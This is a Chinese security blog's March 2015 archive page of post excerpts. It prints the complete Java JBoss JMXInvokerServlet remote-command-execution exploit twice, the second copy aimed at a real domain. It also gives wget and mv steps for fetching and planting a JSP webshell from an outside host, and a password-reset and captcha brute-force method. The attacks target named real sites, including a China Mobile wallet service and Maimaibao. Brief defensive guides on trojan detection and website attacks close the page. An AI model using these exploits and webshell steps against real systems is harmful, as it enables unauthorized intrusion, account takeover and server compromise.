月度归档:2015年03月

买卖宝重置任意密码漏洞(非爆破)

买卖宝成立于2006年,是国内最早涉足移动电子商务的专业平台,致力于为农民、农民工及三四线城市居民提供平等的购物机会。团队积极进取、努力创新,历时多年,已发展成为国内市场份额最高的移动B2C商城。

a.简单复现方式:

1.手机绑定自己的账号,然后用手机接收修改密码的短信

2.用下面链接[小贴士]位置找回密码,抓包改username就可以改任意账号密码了。

http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do

b.复杂复现方式:

1、问题存在wap版本,通过如下链接进行重置密码

继续阅读

JBoss JMXInvokerServlet JMXInvoker 0.3 – Remote Command Execution

JBoss JMXInvokerServlet JMXInvoker 0.3 – 远程代码执行

/*   * JBoss JMXInvokerServlet Remote Command Execution   * JMXInvoker.java v0.3 - Luca Carettoni @_ikki   *   * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).   * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"   * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"   * and the "JMX Console" are protected or disabled.   *   * [FAQ]   *   * Q: Is my target vulnerable烦忙   * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable   *   * Q: How to fix it烦忙   * A: Enable authentication in "jmx-invoker-service.xml"   *   * Q: Is this exploit version-dependent烦忙   * A: Unfortunately, yes. An hash value is used to properly invoke a method.    *    At least comparing version 4.x and 5.x, these hashes are different.   *   * Q: How to compile and launch it烦忙   * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java   *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker   *    Yes, it's a Java exploit. I can already see some of you complaining....   */    import java.io.BufferedReader;  import java.io.IOException;  import java.io.InputStream;  import java.io.InputStreamReader;  import java.io.ObjectOutputStream;  import java.lang.reflect.Array;  import java.lang.reflect.Field;  import java.lang.reflect.Method;  import java.net.ConnectException;  import java.net.HttpURLConnection;  import java.net.URL;  import javax.management.MalformedObjectNameException;  import javax.management.ObjectName;  import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)    public class JMXInvokerServlet {        //---------> CHANGE ME <---------      static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1      static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";      static final String cmd = "touch /tmp/exectest";      //-------------------------------        public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {            System.out.println(" n--[ JBoss JMXInvokerServlet Remote Command Execution ]");            //Create a malicious Java serialized object          MarshalledInvocation payload = new MarshalledInvocation();          payload.setObjectName(new Integer(hash));            //Executes the MBean invoke operation          Class<烦忙> c = Class.forName("javax.management.MBeanServerConnection");          Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);          payload.setMethod(method);            //Define MBean's name, operation and pars          Object myObj[] = new Object[4];          //MBean object name          myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");          //Operation name          myObj[1] = new String("createScriptDeployment");          //Actual parameters          myObj[2] = new String[]{"Runtime.getRuntime().exec( "" + cmd + " ");", "Script Name"};          //Operation signature          myObj[3] = new String[]{"java.lang.String", "java.lang.String"};            payload.setArguments(myObj);          System.out.println(" n--[*] MarshalledInvocation object created");          //For debugging - visualize the raw object          //System.out.println(dump(payload));            //Serialize the object          try {              //Send the payload              URL server = new URL(url);              HttpURLConnection conn = (HttpURLConnection) server.openConnection();              conn.setRequestMethod("POST");              conn.setDoOutput(true);              conn.setDoInput(true);              conn.setUseCaches(false);              conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");              conn.setRequestProperty("Connection", "keep-alive");              conn.setRequestProperty("User-Agent", "Java/1.6.0_06");              conn.setRequestProperty("Content-Type", "application/octet-stream");              conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");              conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");                ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());              wr.writeObject(payload);              System.out.println(" n--[*] MarshalledInvocation object serialized");              System.out.println(" n--[*] Sending payload...");              wr.flush();              wr.close();                //Get the response              InputStream is = conn.getInputStream();              BufferedReader rd = new BufferedReader(new InputStreamReader(is));              String line;              StringBuffer response = new StringBuffer();              while ((line = rd.readLine()) != null) {                  response.append(line);              }              rd.close();                if (response.indexOf("Script Name") != -1) {                  System.out.println(" n--[*]  "" + cmd + " " successfully executed");              } else {                  System.out.println(" n--[!] An invocation error occured...");              }          } catch (ConnectException cex) {              System.out.println(" n--[!] A connection error occured...");          } catch (IOException ex) {              ex.printStackTrace();          }      }        /*       * Raw dump of generic Java Objects       */      static String dump(Object o) {          StringBuffer buffer = new StringBuffer();          Class oClass = o.getClass();            if (oClass.isArray()) {              buffer.append("[");                for (int i = 0; i < Array.getLength(o); i++) {                  if (i > 0) {                      buffer.append(", n");                  }                  Object value = Array.get(o, i);                  buffer.append(value.getClass().isArray() 烦忙 dump(value) : value);              }              buffer.append("]");          } else {              buffer.append("{");              while (oClass != null) {                  Field[] fields = oClass.getDeclaredFields();                  for (int i = 0; i                          < fields.length; i++) {                      if (buffer.length() > 1) {                          buffer.append(", n");                      }                      fields[i].setAccessible(true);                      buffer.append(fields[i].getName());                      buffer.append("=");                      try {                          Object value = fields[i].get(o);                          if (value != null) {                              buffer.append(value.getClass().isArray() 烦忙 dump(value) : value);                          }                      } catch (IllegalAccessException e) {                      }                  }                  oClass = oClass.getSuperclass();              }              buffer.append("}");          }          return buffer.toString();      }  }

from:

继续阅读

中国移动手机钱包业务getshell(涉及多个库多个旁站,可致APK替换)

 

struts2

地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl=

服务器有限制,wget无法直接shell,小技巧绕过

先下载txt格式然后vm命令改成jsp

wget -P 绝对路径 http://www.xxx.com/shell.txt

mv 绝对路径/shell.txt 绝对路径/shell.jsp

root权限
 

继续阅读

JBoss JMXInvokerServlet JMXInvoker 0.3远程命令执行漏洞

  /*   * JBoss JMXInvokerServlet Remote Command Execution   * JMXInvoker.java v0.3 - Luca Carettoni @_ikki   *   * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).   * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"   * serialized  object allows to execute arbitrary code. This exploit works even if the "Web-Console"   * and the "JMX Console" are protected or disabled.   *   * [FAQ]   *   * Q: Is my target vulnerable?   * A: If :8080/invoker/JMXInvokerServlet">http://:8080/invoker/JMXInvokerServlet exists, it's likely exploitable   *   * Q: How to fix it?   * A: Enable authentication in "jmx-invoker-service.xml"   *   * Q: Is this exploit version-dependent?   * A: Unfortunately, yes. An hash value is used to properly invoke a method.   *    At least comparing version 4.x and 5.x, these hashes are different.   *   * Q: How to compile and launch it?   * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java   *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker   *    Yes, it's a Java exploit. I can already see some of you complaining....   */      import java.io.BufferedReader;  import java.io.IOException;  import java.io.InputStream;  import java.io.InputStreamReader;  import java.io.ObjectOutputStream;  import java.lang.reflect.Array;  import java.lang.reflect.Field;  import java.lang.reflect.Method;  import java.net.ConnectException;  import java.net.HttpURLConnection;  import java.net.URL;  import javax.management.MalformedObjectNameException;  import javax.management.ObjectName;  import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)      public class JMXInvokerServlet {          //---------> CHANGE ME http://www.zhongguocaidao.com/invoker/JMXInvokerServlet";      static final String cmd = "touch /tmp/exectest";      //-------------------------------          public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {              System.out.println(" n--[ JBoss JMXInvokerServlet Remote Command Execution ]");              //Create a malicious Java serialized object          MarshalledInvocation payload = new MarshalledInvocation();          payload.setObjectName(new Integer(hash));              //Executes the MBean invoke operation          Class c = Class.forName("javax.management.MBeanServerConnection");          Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);          payload.setMethod(method);              //Define MBean's name, operation and pars          Object myObj[] = new Object[4];          //MBean object name          myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");          //Operation name          myObj[1] = new String("createScriptDeployment");          //Actual parameters          myObj[2] = new String[]{"Runtime.getRuntime().exec( "" + cmd + " ");", "Script Name"};          //Operation signature          myObj[3] = new String[]{"java.lang.String", "java.lang.String"};              payload.setArguments(myObj);          System.out.println(" n--[*] MarshalledInvocation object created");          //For debugging - visualize the raw object          //System.out.println(dump(payload));              //Serialize the object            try {              //Send the payload              URL server = new URL(url);              HttpURLConnection conn = (HttpURLConnection) server.openConnection();              conn.setRequestMethod("POST");              conn.setDoOutput(true);              conn.setDoInput(true);              conn.setUseCaches(false);              conn.setRequestProperty("Accept", "text/, image/gif, image/jpeg, *; q=.2, */*; q=.2");              conn.setRequestProperty("Connection", "keep-alive");              conn.setRequestProperty("User-Agent", "Java/1.6.0_06");              conn.setRequestProperty("Content-Type", "application/octet-stream");              conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");              conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");                  ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());              wr.writeObject(payload);              System.out.println(" n--[*] MarshalledInvocation object serialized");              System.out.println(" n--[*] Sending payload...");              wr.flush();              wr.close();                  //Get the response              InputStream is = conn.getInputStream();              BufferedReader rd = new BufferedReader(new InputStreamReader(is));              String line;              StringBuffer response = new StringBuffer();              while ((line = rd.readLine()) != null) {                  response.append(line);              }              rd.close();                  if (response.indexOf("Script Name") != -1) {                  System.out.println(" n--[*]  "" + cmd + " " successfully executed");              } else {                  System.out.println(" n--[!] An invocation error occured...");              }          } catch (ConnectException cex) {              System.out.println(" n--[!] A connection error occured...");          } catch (IOException ex) {              ex.printStackTrace();          }      }          /*       * Raw dump of generic Java Objects       */      static String dump(Object o) {          StringBuffer buffer = new StringBuffer();          Class oClass = o.getClass();              if (oClass.isArray()) {                  buffer.append("[");                  for (int i = 0; i  0) {                      buffer.append(", n");                  }                  Object value = Array.get(o, i);                  buffer.append(value.getClass().isArray() ? dump(value) : value);              }              buffer.append("]");          } else {              buffer.append("{");              while (oClass != null) {                  Field[] fields = oClass.getDeclaredFields();                  for (int i = 0; i                           1) {                          buffer.append(", n");                      }                      fields[i].setAccessible(true);                      buffer.append(fields[i].getName());                      buffer.append("=");                      try {                          Object value = fields[i].get(o);                          if (value != null) {                              buffer.append(value.getClass().isArray() ? dump(value) : value);                          }                      } catch (IllegalAccessException e) {                      }                  }                  oClass = oClass.getSuperclass();              }              buffer.append("}");          }          return buffer.toString();      }  }       

 

如何检查电脑有没有被黑客木马入侵

 平时使用电脑的时候也许会遇到这样的情况:计算机突然死 机,有时又自动重新启动,无端端的少了些文件,发现桌面刷新慢,没有运行什么大的程序,硬盘却在拼命的读写,系统也莫明 其妙地对软驱进行搜索,杀毒软件和防火墙报警,发现系统的速 度越来越慢,这时候你就要小心了。

第一时间反应(养成一个好的习惯往碗可以减少所受的损失 ):用CTRL+ALT+DEL调出任务表,查看有什么程序在运行,如 发现陌生的程序就要多加注意,一般来说,凡是在任务管理器上 的程序都不会对系统的基本运行照成负面影响(注意:这里说的 是基本运行,先和大家说明白,关于这条我是在网络上关于这个 研究的结果),所以大家可以关闭一些可疑的程序来看看,发现一些不正常的情况恢复了正常,那么就可以初步确定是中了木马了,发现有多个名字相同的程序在运 行,而且可能会随时间的增加而增多,这也是一种可疑的现象也要特别注意,你这时是在连入Internet网或是局域网后才发现这些现象的话,不要怀疑,动 手查看一下吧!,(注:也有可能是其它一些病毒在作怪)

继续阅读

中信集团旗下某商城运维监控系统存在文件上传可获取系统权限

opmanager版本过低,附自己用python写的验证程序

存在问题的站点:http://ns1.dchnu.com

使用了低版本的opmanager,存在上传,该系统是以admin权限跑的,可直接system权限执行命令。

自己写了一个验证程序,可以简单测测,不用搞metolit那么麻烦了。

继续阅读

多个cms后台可被爆破绕过防护

1.Phpcms

Phpcms 中有个phpsso_server

爆破一次之后,不管帐号密码是否正确,Session中的code值不会刷新。

登录页面不能再打开,如果打开之后,会打开验证码的页面,然后code值就变化了。

而且如果用户名不对 输出 用户名没有找到

密码不对 输出 密码错误

根据上面的原理 ,我们可以在输入一次正确的验证码之后,然后导入到intruder模块中进行爆破。

So

爆破方法:输入一次正确的验证码,然后抓包

爆破目标:帐号+密码(分次)
 

继续阅读

常见的网站攻击方式和防护方法(小白通俗篇)

 作为站长兢兢业业的编辑推广,辛辛苦苦才收点广告费,网站流量大了便会时常面对的攻击,我的网站遭遇了两次因攻击死亡或瘫痪的经历,第一次是织梦CMS被博彩整站篡改网站死亡,第二次是刚刚经历的流量攻击网站多次瘫痪流量波动,故总结下常见的网站攻击方式和防护方法,以供自己和大家参见,因安全这方面我也是小白,这里以小白看得懂的语言分类编写,如总结有误或不足,望大神们不吝赐教。
常见的网站攻击方式和防护方法(小白通俗篇)

第一种:网页篡改

攻击描述:针对网站程序,植入木马(webshell、跨站脚本攻击),篡改网页,添加黑链或者嵌入非本站信息,甚至是创建大量目录网页,以博彩攻击织梦CMS最常见。

继续阅读